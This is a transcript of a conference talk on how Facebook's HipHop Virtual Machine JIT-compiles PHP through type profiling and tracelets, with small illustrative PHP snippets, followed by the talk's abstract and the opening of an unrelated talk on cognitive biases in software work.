answered. Yes? Feedback cycle and debuggability. Did I give you an invitation for tonight? Okay. I'll see you then. By the way, for folks who have not been in my first talk, I have some wonderful invites. I presume people who are interested in this kind of stuff would be interested in talking to me and my coworkers a bit more. So this is a private party by Facebook tonight at 6 at a very posh location in Oslo, free drinks and food. So ask me questions if you want to get some of this good stuff. All right. I think it's a, I have questions. No, I didn't. Hold on. Okay. So the whole debug cycle.
So for a while, while we had the static compile, we had this weird situation which was, you know, if you want to kind of develop the site, work on the site day to day, you'd be using the interpreter. And then if when you're kind of, yeah, I'm done and stuff, you push the thing into version source control and we had this, this short, this long cycle build which would rebuild the site overnight and whatnot. And well, guess what? There's the interpreter which does things one way and there's the compile which does things the other way and supposedly the things are 100% identical. And as I'm sure you know, it's like synchronizing clocks. You can never do it like 100%. Right? There's going to be small variations in behavior. There's always going to be this one little thing, this one little sequencing, this one little quirk that you're not going to get the same. So we did have issues with, you know, this works on my machine under the interpreter. It doesn't work on the compile thing and oh my God, let's take a look. Let's see what the hell is happening here. So definitely that was not tenable for a long time. But it did by us 2X compilation, sorry, 2X run speed. So switching from Zend to Hip Hop was like 2X faster to run the site. So that means, I mean, you know, translate the other way if you look at it from the other frame of reference, it means less power consumed for the same functionality or more functionality for the same available power. Which is kind of awesome because, you know, at Facebook it's always good to have some more committing power available for interesting stuff that could be going on, people you may know and, you know, good ads, you know, which I know you guys hate. And stuff like that. Now, the power consumed per user of Facebook, we published that a while ago. Actually, it's very low. It's like, you know, it's in the hundreds of milliwatts per user. So it's like you have a little light bulb there and it's just, you know, that's how much power you consume per user. So it's very economical in that sense. Okie doke. 2012, well, as I said, last November we launched the VM, but, you know, it kind of had a long history. We started development a couple of years earlier and it's a virtual machine. It's an adjusting time compiler and it unifies the development and production which solves that problem that you mentioned because essentially you could use the same exact generator for both day-to-day work and the website proper. So that solved a huge problem. In a way it was a step back because it's much more like an interpreter than a compiler, but in many ways it's been a step forward. So let's take a look at how much faster things have been due to using this technology. So, ok, so we have Zend which is like, you know, less than 12 tries as slow. And this would be like, let's say, as reference, let's use the throughput that we achieved through the first release of hip-hop. So this is the throughput, day-one, hip-hop. And then the nice thing is that people have worked on the compiler to generate better code to, you know, kind of make it better and stuff like that. So they kind of, you know, it's like squeezing blood from a stone. They kind of got yet another 2.5x, 2.3x improvements just by improving the static C++, the static compiler that generates C++, generate a better C++ and things like that. So we are way, way ahead like what we would have done if we use like kind of run-of-the-mill technology for running PHP. That was great. 
Do you think you can do better than that with the VM, or is it going to be worse? I mean, what do you think is going to sit, if you have like, okay, let's build a VM and JIT for this? What's your opinion? Honest question. It's not a trick question. Lower? Yeah, actually, that is correct. In the first release that actually worked, the internal release, in the first kind of version of the interpreter that actually worked, the JIT was 8 times slower than the production HipHop. And true story, so I, you know, I was like, this team does interesting stuff and whatnot. And my manager at the time, he said, I would not advise you to join that team, because that team is not going to work out. The project is not going to kind of work out. And one great thing about Facebook is that we get to try like weird projects all the time. And those that succeed are like, you know, they're just amazing, because they're so out there that if they succeed, the win is big. It's not kind of a conservative bet that's likely to succeed in a little way. So, very interesting. So, I did end up on that team, by the way. So, I'm on that team now. So, kind of, there's a poetic revenge of sorts. So, that's the static compiler evolution. Very nice. Probably Zend kind of, you know, kind of improved a bit too, but I presume it's nowhere near that. So, from the whole project of JITing PHP, we kind of learned a very important thing. That type inference is sort of the crux of the matter. The most important, the one single most important thing that you care about when it comes to JITing, at least for this particular language. Let's say this particular language class, because probably things like Python would enter the same, the same realm. So, type inference would be the, you know, the best thing to look at and the most important sort of focal point of the whole discussion. And let me kind of give you the details on why. First of all, PHP has dynamic types. Like, who knows the Goldbach conjecture? Question for a ticket. All right. So, the Goldbach conjecture is like a famous conjecture devised by a guy called Goldbach in 1742 — I'm making this up, it was sometime around there, the 18th century. So he said, you know, I tried it for a few numbers and it turns out that every even number greater than two can be expressed as a sum of two prime numbers. That's interesting, because the guy had kind of tried it on like, I don't know, 15 numbers or whatever, you know, like a few numbers, because he didn't have a computer. So, now it's checked up to like, you know, 10 to the power of 18. It's like they didn't find one that doesn't work. So, anyhow, it's one of the greatest open problems in, you know, science — sorry, in math. And this is going to be, well, depending on the Goldbach conjecture, give me a float or give me a string. So, you can't know statically what's going on, right? Another very classic example is like, take a row and give me the first element of that row. And depending on the schema of the data, basically, you're going to get an integer or a float. And not to mention, like, you know, division — and the result can be an integer, floating point, or even a string or a map or what have you. It's completely dynamic, right? So all of these are also like, in part, part of the power of PHP, because you get to, like, manipulate the databases in a very convenient manner. By the way, question for you guys. How many of you use a dynamic language like this in your daily work? Okay, for a moment. Great.
So, you know, understanding all of this stuff is kind of useful and good to have, you know, apple pie and motherhood. However, we figured out something interesting. We figured out that, statistically, most expressions have one type, which is very interesting, because it takes you into a whole different world in which you don't care about the exact type, you care about the most likely type. And there are some good examples. I mean, for most of your PHP work, your interpreted work, you know that, you know, you divide two numbers, it's a number, and that kind of stuff. So for example, this guy is almost never false. I think it's false if you divide by zero, or something, I forget; you know, it's one of those weird "PHP is hell" kind of articles, right? Oh my God, if I divide a map by a string, it's going to give me false, and that kind of stuff. I don't know, is this the case? Who knows PHP real good? Okay, nobody. Well, I guess it's a compliment. Database row types kind of stay put. So whatever you get the first time you access a row of a given database, it's going to keep giving you the same thing. A given global is always true or always false, at least within a running program, and so on. So, you know, this is very interesting because there's kind of a long-range correlation here. It's like, you know, a century ago algebra was the thing in math, along with mathematical analysis, derivatives and integrals and such. Those were the big things in math, and right now, what do you think is the biggest thing in math? What's hot in math? Big data. Exactly. So what is the math aspect of big data? Machine learning, and what's the big mathematical thing behind it? Statistics, you got it. I gave you an invite already. So statistics is sort of the new algebra, if you wish, right? You're not operating with known things, discrete things, things you know about. It's all statistics now, and machine learning is a great application of it. Big data is big because, what do you want to do on big data? Do you want to look at every single thing there? Sometimes with big data you look at aggregates and statistics. So I was saying, there's this long-distance relationship: statistics is the new algebra in math, and statistical typing is the next big thing in writing a good interpreter. This is interesting. So indeed, statistics are good, because for a language like this, you know that an expression can have any possible type. But actually, statistically, it's going to be, like, 99 times out of 100, always one type. And yeah. Do the statistics change with the quality of the engineers? You know, I mean, honestly, I'm going to be very serious here. I think this is a good research topic, because I could presume that a certain style of programming, or a certain, I don't know, style of application, or a certain approach to engineering, would lead to different spreads of these statistics. So I don't know, what would be your guess, folks? Does a bad programmer write statistically more entropic types or not? So this is kind of an interesting question to ask oneself, and it would be a good subject for a study. But, you know, if I were one of those developers and the study issues a result that tells me I'm crappy, I don't want to be in that study, you know?
So I kind of want to avoid that. You know what? Don't publish that. Okay. So at the same time, let me issue an opinion on this. I think people who write highly entropic types, if you wish, with statistics that are spread out, in a way they exploit the language better, because they take advantage of the dynamism in ways that may be creative. So that's a kind of interesting open question. All right. So our vision, I mean, my team's vision, I wasn't there yet, with HHVM is that, well, let's keep an eye on types and the statistics of types. And we're not going to generate code right away. We start by interpreting code, and that's what many VMs, many JITs, actually do. So you interpret code and track the most likely types to be there, and you discover, in real time, the types that cannot be inferred ahead of time. One interesting side point is that we didn't want to build the absolute best static compiler. So we didn't want to say, oh yeah, we'll analyze the whole PHP program and, you know, collect statistics and whatnot. And we didn't want to have the minute optimizations that are the hallmark of modern compilers. For example, something like 70s compiler technology would have been great for us, because, you know, the matter is we're not compiling C. We're compiling a different language. So our approach was: take PHP, watch the types, generate specialized code for those types, as I'm going to show you in a minute. And the generator of specialized code for those types does not have to be the best compiler ever, right? So far so good. And by means of introduction, one step that was done way ahead of time: PHP has sort of a semi-standard bytecode format, which is kind of simple. So, you know, A plus B gets C is going to be translated into simple stack machine bytecode. You're going to push argument two, push argument one, add, and then set the left value to the result. All right. And a simple program. I swear I didn't design these slides, but I discussed min and max in my previous talk, and I swear there's another guy who wrote these slides and he also discussed the same example; call it serendipity or monoculture, if you wish. So: function myMax(A, B). I'm not going to be very rigorous here, but, you know, this is PHP. So let's see, step by step, what happens to this function to the point where it gets munched by the interpreter and we get results from it. So first of all, you can call, like, max of two integers, good; two floating points, good; booleans, good; arrays, which is kind of interesting; other arrays, which is even more interesting; and strings, which is going to return the max of the strings. So we have all this polymorphism encoded in a very terse manner, without types. It's all dynamic, so it's all going to be dynamically dispatched and all. All right. Well, let's compile down to bytecode, and I'm going to tell you exactly what happens here. So I'm going to push an L value, which is the second argument I got, on the stack. So this one is, you know, the second argument on the stack, and zero is the first argument on the stack. So with this, I'm pushing A and B to the sort of operand stack, right? Who's familiar a bit with this notion of a stack machine? Okay. I don't need to explain anything. I'm done. Okay.
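The function he's walking through looks roughly like the PHP below. The body is a reconstruction from his description, and the bytecode in the comments is only an approximation of the HHBC sequence he reads out, not a verbatim dump of the slides.

  <?php
  // One terse, untyped definition that works for ints, floats, bools, arrays, strings.
  function myMax($a, $b) {
      if ($a > $b) {       // roughly: CGetL <arg>; CGetL <arg>; Gt; JmpZ <label>
          return $a;       //          CGetL <arg>; RetC
      } else {
          return $b;       //          CGetL <arg>; RetC
      }
  }

  var_dump(myMax(3, 7));             // int(7)
  var_dump(myMax(2.5, 1.5));         // float(2.5)
  var_dump(myMax('apple', 'pear'));  // string(4) "pear"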
So I'm pushing these guys on the stack; greater takes the top two things, eats them, and puts back the result on the stack. Stack machine. You raised your hand, come on, right? Everybody raised their hand. Okay. And then if the result is zero, I'm going to jump over here and push the second guy, and otherwise I'm going to push the first guy and return. Awesome. And I'm done. Terrific. And this all is bytecode, but it's sort of a high-level bytecode, if you wish, because, for example, this Gt is, you know, code that handles strings and knows about arrays and all that stuff. So it's sort of high-level bytecode. This is our HH bytecode; that's our internal name for it. Great. Well, how do we get from here? Let me get back a bit. How do we get from this bytecode to something that's really fast, that is able to do the integer version real fast and stuff like that? So we had, well, it was really the team before I joined. So, sorry, there's a question? Yes? Why did we choose a stack machine as opposed to a register-based machine? Right. Actually, that's a great question. And I'm going to give the short answer, because this is the subject of debate, and we could talk about this; people may disagree on this. And the short story, and Java also chose a stack machine, as you mentioned: the short story is stack-based machine code is easy to generate, easy to interpret, easy to look at. It makes for an easy, basic toolchain. Whereas with a register-based thing, you've got to have a register allocator and all of these esoteric things. And there's a paper, I recall, that a colleague mentioned to me, where an equivalence has been demonstrated: you can take code for a stack machine and turn it into code for a register machine, and the other way is much harder, or something like that. So there's pros and cons all the way. But essentially, choosing a stack-based bytecode makes for very small bytecode that's understandable. So actually, the size of the bytecode is also a big thing. This is very compact, because it uses the stack implicitly, as opposed to put this in register A, put this in register B, and so on. So, all right. Care for an invite tonight? Okay, I'll put it aside for you. Feel free to come take it. All right. So the first insight here is that we don't want to optimize across jumps. We want to take a basic block at a time. In compiler-writer terminology, a basic block is a block that has no jumps anywhere, has no branching, no if, no while, no nothing. That's a basic block. It's contiguous, streamlined code. And we're going to specialize for specific types or combinations of types, our underlying goal being incremental type discovery. And here's how it works. We define this notion of a tracelet. And a tracelet is going to be one of these basic blocks inside which the types are given, known. So once you have a tracelet, you get to actually generate machine code for it that's fast and efficient and everything. And this is very interesting, because then you have a sort of collection of tracelets that interact with each other, and you can combine them, depending on the types, to obtain pretty fast code. So the tracelets are built just before running them. And of course cached; there's a repository of tracelets.
And they're translated to machine code, which is also in that cache, the repository. And then they're going to be chained appropriately to get work done. This is sort of good and bad, because in PHP the average length of a tracelet is just a few instructions. So it's not very much; in a good compiler, you want to have as much code as possible to optimize over, right? You know, like interprocedural optimization, whole program, and then inside a function, and inside a block, and so on. And the best optimizations are those of larger scope; they're slower, but they optimize very well. So in this case, it's kind of a disadvantage that tracelets are so short. So, well, at the tracelet boundaries, we're ready to do an on-stack replacement to the interpreter, and this is good, because what you want is to have the interpreter and the tracelets replace each other at a moment's notice. And let's take a look at how we build a tracelet for this particular call. So myMax, two numbers, two integers. Here's the initial code. As I said, tracelets are contiguous; they're going to have no branching. So this is my first tracelet, right? And this is my sort of abstracted-away tracelet with, you know, JmpZ, whatever. And it's a very short sequence of code, but you'd be amazed how much we can do with it. So we have two locals, we know, and we type this particular specialization with int and int. So by this point, we have a tracelet that's guarded: I know it's an int and I know it's another int, and based on those assumptions I'm going to generate code. Once that's happened, well, hold on. So greater is going to be a function that takes two ints and returns a bool. I know that because I have the guard here, and the conditional jump is going to be like a function that takes a bool and returns nothing. It's a continuation. So, wow, very interesting. So at this point, this greater can be specialized, which is a big deal, it turns out. It doesn't have to be a greater-than that knows about all types in PHP. It's a greater-than that knows only about integers. And then, and here's where things get interesting, we get to take this tracelet with the guards. So these are the guards. This is actual bytecode for PHP. And we actually translate the guard, which is really, you know, look at the type tag of the first argument and look at the type of the other argument. And if they don't match this guard, then actually I'm going to retranslate, take the alternative route. And this is, you know, the generated code for that thing. How much faster do you think that's going to be? So myMax of 10 or whatever, and instead of interpreting this thing, you're going to actually do this. So we have two jumps here that are going to guard. And then I'm going to have the classic: I move into registers and compare the registers and jump and such. Well, put it this way. It's fast enough that even a mediocre code generator, right, even a mediocre code generator with this strategy, is going to do better than the interpreter, right? Once you have this whole strategy of specializing depending on the types. All right, so continuing that, we have some more stuff, and some more stuff, and some more stuff here. So we have a very small tracelet there.
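You can picture what the guard plus specialized body buys you with a plain PHP analogy like the sketch below. To be clear, this is only an illustration added here: the real thing is generated machine code inside the JIT, not userland PHP, and these function names are invented. But the shape is the same: check the type tags cheaply, take the specialized fast path when they match, fall back to the generic path when they don't.

  <?php
  // Generic path: has to cope with every PHP type, so it is the slow one.
  function myMaxGeneric($a, $b) {
      return $a > $b ? $a : $b;
  }

  // The int/int "tracelet": valid only under the guarded assumption.
  function myMaxIntInt(int $a, int $b): int {
      return $a > $b ? $a : $b;   // in the JIT this boils down to a compare and a jump
  }

  function myMaxDispatch($a, $b) {
      // The guard: verify the assumed type tags, otherwise fall back (retranslate).
      if (is_int($a) && is_int($b)) {
          return myMaxIntInt($a, $b);
      }
      return myMaxGeneric($a, $b);   // the long tail stays on the generic path
  }

  var_dump(myMaxDispatch(3, 9));       // hits the specialized path
  var_dump(myMaxDispatch('a', 'bb'));  // guard fails, generic path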
And we're going to stitch these tracelets together: okay, int, int, this is my tracelet; int, int, this is my second tracelet, which is just a return, an extremely short tracelet. And they're tied together, stitched, in our cache repository. And all of a sudden, you're going to have a working program, a working function. And it's going to do work for integers only. Well, what happens if I call the thing with, let me see, okay, what are we going to do if you call it with strings? Then at the guard it's essentially going to jump to the retranslation flow, which is going to do the same for strings, essentially. It's going to say, well, I'm going to generate code for strings. In the string case, you don't want to do the inline code, you want to call a function, because it's just much more complicated. Very interesting. So once you have, in this instance, strings, you generate code for strings and re-use it, because you have the cached tracelets and their generated code. So you don't need to generate code twice for the same tracelet. Now, here's the problem. Do you see it? With these guards here, any combination of types is going to generate yet another tracelet. So you have this exponential thing. Consider, you know, you have three inputs, and any combination of the three is like two to the power of three. Actually not two, but the number of PHP types to the power of however many arguments you have. So it's getting really, really messy out there. And statistically, it's a long tail, but it's very thin at the end of the tail. It's like a rat's tail, if you wish, right? Okay. So there's a lot of type combinations, exponential and everything, but beyond six, twelve items, you're going to have only this many chains that are left to the interpreter to take care of. So statistics again, the principle here being: we're going to address the most frequent cases with compiled code, and the long tail, the complicated stuff, the combinations of types that nobody heard of, we're going to let the interpreter take care of them. It's not going to affect our speed, because of the sheer statistics. Yes? Okay. So you stated that exactly right. The question was, do you profile what types are more frequent and how that evolves with time, because maybe during startup you have some combination of those types and then later on there's others, right? We kind of do that. We have some warmup procedures and whatnot. So actually, you know, you're addressing a very direct question. But in general, for, let's say, a sort of stable JIT that's loaded, there's little variation over time in the most frequent types. But it's a legitimate concern to have. Now, let me make one more point. This is going to do really badly in microbenchmarks. By microbenchmarks, I mean you load this much PHP code, you run it, and you go away, right? And we're not doing well at all in these very small benchmarks, because if you just run some code once, the whole JIT thing is not even going to enter into action. It's just going to let the interpreter do the work. And our interpreter, you know, is just not optimized to be the best interpreter around. So it's doing pretty badly in these benchmarks.
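The blow-up he's describing is easy to put rough numbers on. Here's a back-of-the-envelope sketch, using a made-up count of about a dozen runtime type tags, just to illustrate the growth:

  <?php
  // Roughly a dozen runtime type tags (null, bool, int, double, string, array,
  // object, resource, ...); the exact count is not the point here.
  $typeTags = 12;

  foreach ([1, 2, 3, 4] as $arity) {
      // In the worst case, every distinct combination of input types wants its own tracelet.
      printf("%d inputs -> up to %d type combinations\n", $arity, $typeTags ** $arity);
  }
  // In practice a handful of combinations cover almost all executions, so you cap
  // the number of specializations per tracelet and let the interpreter take the rest.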
But on benchmarks of whole sites, like the ones I'm going to show, these are much more interesting. So the camera didn't work after all. Or it did. All right. So, as a good sort of extra point, consider methods and functions. Well, again, you don't know what they return. So our early approach was, well, whenever you have a return value, it's treated like a jump. It's treated like, you know, break the tracelet, start all over again, in a way. Later on, so this is an example, like you may have a class that has a getName, returns this name, and you have a constant string here. And what type do you get here at object getName? So what we ended up doing is called type profiling. There's some work that's fairly old by now, well known and well used, called value profiling, which is: this particular function, like square root or, you know, sine or whatnot, is going to be called frequently with certain values, and I'm going to generate optimal code for those particular values. And then for the others, I'm going to use the generic approach. So this value profiling is well known and well understood. For us, it's type profiling, which is: depending on the type of the value, we're going to generate different code and such. Now, the thing is, if you go with this approach of type profiling, you're going to need a long calibration, which is exactly the startup problem we mentioned: how long until we decide that, yeah, this function returns this type all the time, or most of the time? So the next idea on the board, which was successful, was, well, let's profile names, which sort of uses the name of the function, and we map method name to return type in a table, a hash table. And the system kind of learns things like: methods named getName return strings. Big surprise. It's a great heuristic. I think that Keith, who invented this, is a brilliant guy, and he had this stroke of genius, which was, like, it's the name of the function, dummy, which kind of tells you its type. So, well, this works everywhere, you know, methods, free functions, whatnot, and it exploits the way that humans naturally write code, which brings me back to the social coding aspect and all that. So, consider that our code base, even though it has millions of call sites, only has like 13,000 or so actually unique symbol names. And the accuracy is amazingly high. Let me give you some examples here, which are kind of interesting. Well, reset is going to return null. getTimer is going to return int. Big surprise. getLoggedInUser is going to return the user ID. isFbEmployee is going to return bool. arrayPull is going to return an array, and so on. So, pretty nice. It actually kind of just works. And it's hard to imagine that htmlToTxt is going to return a double, right? So, this is one of those things that just work. And now let's make it work fast. So, let's put the pedal to the metal, see what happens. Today's JIT, compared to Zend, does really, really well. And, you know, Zend is a very mature technology. It's sort of a mature interpreter, and people have invested a lot of work in it and such. And this stands as one of the proofs that actually even an OK JIT is going to do a lot better than a well-tuned interpreter.
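A toy version of that name-to-type table might look like the PHP below. The entries mirror the examples he lists, but the data structure and the lookup are my own illustration of the heuristic, not HHVM's actual internals.

  <?php
  // Learned mapping: symbol name -> most likely return type.
  $predictedReturnType = [
      'reset'           => 'null',
      'getTimer'        => 'int',
      'getLoggedInUser' => 'int',    // a user id
      'isFbEmployee'    => 'bool',
      'arrayPull'       => 'array',
      'getName'         => 'string',
  ];

  function predictType(array $table, string $symbol): string {
      // Unknown names fall back to the generic, unspecialized path.
      return $table[$symbol] ?? 'unknown';
  }

  echo predictType($predictedReturnType, 'isFbEmployee'), "\n";  // bool
  echo predictType($predictedReturnType, 'htmlToTxt'), "\n";     // unknown (but surely not a double)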
So, you know, this would be a good takeaway for today's talk: the big results actually depend on the technology more than on the details of how you do it. But again, if I were to show you the microbenchmarks, Zend would do better, which is kind of interesting. But we don't care about microbenchmarks, we care about running the site, right? There's the inevitable kind of bragging here. So, actually, people are starting to discover that HHVM is really fast. And here's an example of a success story. WordPress on HHVM runs faster than pretty much anything, including our own static compiler. So, it delivers many more requests per second than Zend or other interpreters. So, these are Facebook technologies. And this has very direct money implications. Consider the Facebook CPU idle. So, these are days. And this is how many percent idle the CPU is on a typical server at Facebook. Actually, this is averaged. And the red line would be the static compiler and the blue line would be the JIT. What's interesting, I mean, they look almost the same. So, first of all, let me ask you this. Why is it like that? I'll give you a card. The day-night cycle, yes. So, day, night, whatever, right? Actually, it used to be much more pronounced, but since we have so many international users, it's kind of flattened out. I'll give you a card, right? In good shape. Okay. So, that's the day-night cycle. Day to day, people, you know. And what's one interesting thing about this graph? Red versus blue, although they look almost the same, there's a big difference between them. Yes. The blue is a bit below at the, yeah. Careful, okay. So, the blue is below. So, below, like, low CPU idle, it means, what does it mean? Utilization. Utilization, exactly. So, the utilization is higher. So, the nice thing is that, I think I reversed the thing. So, essentially with the JIT, you get to do the same work with less, with more idle time. Sorry, I was wrong. So, more idle time. So, the red line is good and the blue line is bad. And this difference, the key point here is that you provision your servers for maximum load. You don't provision a server for minimum load. So, this I don't care about. I don't care about this, like, maximum idle. I don't care. I care about this, because here's how I dimension my servers. Here's how I decide to buy servers and, you know, lease stuff and power sources. So, this is important. And the more I can move this up high for the same functionality, the better off I am, because I don't need to buy that many servers and pay so much money for the power. So, the difference here, we're looking at, you know, a good, like, 6% here and here and here and elsewhere. We're looking at a good bit more idle time per machine, which means the machines are going to consume less power, and the power costs less money. So, this is very nice. And again, I mentioned this in my other talk today. Essentially, every 1% we save is literally, like, you know, a vast amount of money per year saved in power costs. It's very powerful. So, you have some of the best, most senior engineers who work on that. It's a huge deal. And I presume it's only going to be a huge deal going forward into the future, with computing and technology at large in general. So, I think this is sort of a big deal. Yes?
So, the question is, first of all, these guys perform at the same rate, approximately, yes. So, the differences in requests per second are minor. And the actual question was, well, do you care about having as much idle time as possible? Kind of, no. Yes. And the answer is, whenever you have a major event at Facebook, like the Arab Spring or, you know, the Boston Marathon disaster, or, you know, a lot of good events that are very popular, a FIFA World Cup and whatnot, there's going to be a high load. So, you've got to provision for, like, here. You've got to be ready to handle this. You don't care about this. You care about this. So, the more you get to save on that bottom there, the better off you are, right? And indeed, at this level, that means essentially we're consuming less power for the same work. All right. So, the static compiler is not in production anymore. We actually took time, and I participated in that, I'm very happy, we took time to remove the old code, the static compiler to C++, from our C++ implementation of the JIT. So, we can't directly compare. But last time we looked, HHVM was about 20 percent better. And don't forget that the static compiler was already pretty darn fast compared to, like, the state of the art, Zend and others. And at launch last November, it was, like, already 8 percent. And I perceive it to be, well, it's very fun. Like, at Facebook, we're like, oh, lockdown. We've got to improve 10 percent. And every engineer on the team was working on optimizations that would, you know, gain half a percent, one percent. And we added those, and we had a graph, and we had Jean-Claude Van Damme doing a dance at the end when we made it 10 percent. And it was kind of a nice curve, meaning that, you know, if you continue on that trend, we're going to be, like, faster than the CPU itself. That's a joke. All right. So, this is great, but it also means we eliminated a lot of cruft, and we can't compare it directly against HPHPc. All right. To conclude, the virtual machine, which is open source, by the way, can run your PHP. It's very fast, and it's good for production; it's good for development because the compilation time is just as you'd expect, like, really fast. And our claim here is that type inference is the first-order, you know, the topmost issue for dynamic languages. If you have good type inference in your JIT, then you're going to have a good JIT. If your type inference is kind of not there, you're going to have a crappy JIT. And there's a lot of work that's left, and I'm going to mention a few things that are on my mind. So, I have this big repository of these little tracelets and the generated code. And one question is, you mentioned this, like garbage collection: what happens here? Some function, some particular tracelet is very frequently used at some point in the lifetime of your machine, but then it kind of falls out of favor. Nobody uses that crap anymore, right? So, what are you going to do? You generate these tracelets, and at some point you kind of saturate; it's like, oh, we're kind of full with tracelets here, we have enough. But some of those are going to be less used than others. So, the question is, do we have a cache eviction policy there? You know, what should we do? And there's work on that. So, we're kind of thinking of how to address that.
Other topics that come to mind are things like extensions. You know, a lot of high-performance PHP code must rely on C++ extensions, because it's difficult to write really tight loops in PHP. And, you know, one more, yes? So, the question was, did you think of doing what TypeScript does, which is allow optional type annotations by programmers? I can't talk about that now. All right. Other questions, quickly please, yes? Oh, by the way, that does deserve a card. Are you in town tonight? All right. Here it is. Yes? HHVM, yes? So, the question was, does your JIT assume this model of the script that dies at the end of the request? Actually not. So, the way things happen, really, yeah, each request dies and everything, but actually the engine, the JIT engine, stays loaded for many invocations, for many requests. You don't load the JIT for every request, right? So, the whole isolation between requests is at the PHP level. It's not at the JIT level. You see what I'm saying? So, the JIT is sitting there, it's loaded, and loading it and unloading it and stuff is kind of an issue of its own, very interesting. We use, like, BitTorrent and that kind of stuff to distribute these things. But essentially, the JIT stays loaded in memory and collects the statistics over many of these requests, right? It's not just one request I'm looking at. Because one request could be, like, half a second, right? How long does your average Facebook page take to load? It's, like, you know, 200 milliseconds. So, you can't really gather statistics from one thing. So, essentially, the JIT sits there, looks at requests, collects statistics, collects tracelets, does its work, right? If what you're looking at is optimizing one short script that you run once, maybe a JIT in general, not only this particular incarnation, is not for you, right? So, what you want is either a long-running program, or loading many short-lived programs into this JIT. And by the way, that brings me to a different research topic that we're kind of working on, which is the following. We have many millions of, not many millions, we have many servers. I don't know how many. So, we have many servers at Facebook, data centers and whatnot. There's plenty of computers. And each is collecting its own statistics. Why? I mean, pretty much the workload on any two given servers is going to be about the same. So, why not have a sort of distributed caching and sharing mechanism for these compiled tracelets? And then you get to use much better statistics, because you can collect over days instead of hours. And you get to, you know, share work. So, I have the tracelet for myMin here; I'm going to use the one in, you know, our server in Sweden or whatever, right? By the way, we just opened a data center in, what's the name? It's in Sweden. It's, like, by the Arctic Circle, where, you know, the night is about to start, like, right now. Right? So, great. Cards: if you're in town, don't forget to pick them up, folks. Okay? All right. Congratulations. Cheers. Don't drink too much. Don't drive. Yes. In the back. Yes. Is it for Java in particular? Oh. I wouldn't know about that particular system in particular, but I have a colleague, Keith Adams, who contributed a lot of these slides.
And essentially, he has like, he has another talk in which he kind of explains all the technologies they looked at when they started this and, you know, kind of neither was exactly there for our kind of workload. So I can only presume that, you know, he looked at that and he didn't quite work well for our case. Yes. Do you have any questions? Do you have any specific questions? Ah. So do we have, wow, I have really good questions. So not a lot of you guys, but really, really good questions. So let me kind of restate the question in my words. So do you have the same JIT instance for a lot of different requests as opposed to some sort of JIT specialization for, you know, I'm going to serve only with the home page from this JIT? The answer is we use the same JIT for a variety of requests, but this whole notion of JIT specialization is extremely interesting. We thought about a bit about, like, you know, what do, you know, how do you cluster requests? Like, requests for, like, I don't know, images, I'm sure they have a very different workload than requests for, like, text, you know, and kind of stuff. So actually, this, yeah, this is a super interesting topic. So, you know, maybe we can chat about it tonight. This is very interesting. I'm actually very pleasantly surprised to hear that. So this is great. All right. We have time for a few more questions, yes? What if your code base uses a lot of objects? This is a real problem. Thanks for asking. So actually, it's kind of funny. This is a, because somebody asked, like, what happens over time, like, you know, for a given team? And it's very interesting that the PHP code base at Facebook has with time become more sophisticated. Like, before, I was like, yeah, yeah, just, you know, let's kind of grow and it does kind of all simple and kind of a simple feature site. But right now, we have objects for everything. And actually, at this point, I forgot the statistics, but actually, a lot of our data, like, dollar A you receive, is an object, actually, right? And that was not the case, like, seven years earlier, which makes for a very interesting analysis in evolution. So we do have specialization for objects. For example, methods, so what type does the methods return that's already working, right? But for objects in particular, there's some interesting issues, like, you know, you want to, you have an object and it has a schema because it has always has a get name, get ID and I don't know, send request or whatever, right? It has, like, given method names. And we're looking at how to optimize particular calls for these kind of known methods. So there's more work to be done, but we already kind of are prepared for that. So we're in good shape. Okay, for one of these? All right. Awesome. Yes. If you look at, if you look at, maximum function, yeah. Yes. Let me go back to the function real quick. Okay, so let's start from here. So the question was, you've had the MyMax function and you have three basic blocks. Yes. Right. So, okay, let's see the function itself. Yeah, this is the whole function. You have three basic blocks. Yes. And, okay, okay, okay. So the question was, well, so you have one function, you decompose it to basic blocks and then where's the logic that kind of knows that the blocks are coming from the same function, right? Right. Well, I didn't give a lot of detail about this, but the magic here happens in the, in these connections here, right? Let me kind of bring the, okay. So in the connections here, and we have some interesting rules. 
So a given block can have multiple entries, but only one exit and things like that. So essentially, although the blocks do not nominally belong to a given function, you know what the interleaving is because, but you could have the same, you could have actually the same code in one tracelet and have it linked differently so it can appear multiple times because of the links. So, you know, it's the same function because of the connections. And that's also the disadvantage because you get to have multiple instances of the same blocks. So there's sort of a bloating of blocks, but that's not, that's not really a material. It's not a lot. Okay. I think we only have time for, I've seen a person who came like after the previous talk, so I think we're about done. So with this, I invite you all for talking with me after this. I'll be here for a couple more minutes, and I would like to thank you for coming here. Thanks a lot.
|
Facebook platform's enormous success has been fueled in part by the LAMP stack. A large PHP code base leveraged over many servers poses unique efficiency challenges, both in terms of machine utilization and electric energy consumption. The open-sourced Hip Hop Virtual Machine is running on all of Facebook's production servers at better efficiency than all of today's PHP engines. This talk describes the state of the art in getting PHP code to run efficiently through a combination of bytecode interpretation and Just-In-Time compilation and optimization.
|
10.5446/51539 (DOI)
|
Alright, hello. How was everyone? Thinking about lunch already? Yeah, okay. Dynamite. You having fun so far? Okay, that's good, that's cool. Alright, well, so if you're anything like me, by now you've been to a whole bunch of talks and you've heard stuff about C-Sharp and functional programming and Agile and this and that and your head's about to explode, right? Good, cool. Well, this will help. This will really make it just burst out. So I love this, I love this background picture here. Alright, what if my clicker worked? Come on clicker, you can do it. There we go. Do you know what this is? This is in fact the first bug. You've heard the story about when they were debugging the, what was it, the Mark II relay calculator, September 1945 and they had this problem, this was a relay calculator, they're going through running a sign and cosine unit test, bless their hearts, they're running it and there was a bug and they found there was a moth trapped in the relay. They took the moth out, taped it to the log book and that was indeed the first incident of debugging a computer. 1945, an old joke. So we've had bugs in computers for a long time, sometimes literally so, but as it turns out, we've got bugs in the very way that our brains work. We've got quite a few of them in fact. So I want to go through today and just show some of the more interesting or amusing or common bugs that affect our decision making, how we write software, how we do agile processes, all these sorts of things. The first thing I want to talk about is how we're creatures of habit. So here we've got the policeman out to give tickets behind the sign that says, slow down, the cop hides behind this sign. Clearly he's still hiding there, just creature of habit. But it's kind of funny, they do a lot of studies on selective awareness and gradual change and it turns out we're really not nearly as observant as you might think we are. And I've got a couple samples here just to show how that works. The first thing I want to show is a fairly difficult counting task. So what's going to happen is you're going to see a bunch of kids passing a basketball, wearing some wearing white shirts, some wearing black shirts. And the idea is you've got to really focus on the players in the white shirts and count how many times they pass the basketball. Now it's not impossible, this isn't like one of those trick, you know, sight questions. You can actually do it but you just have to focus very closely and count the total number of passes. Alright, you ready? Okay, Twitter down, email down, here we go. We're going to count the number of passes. 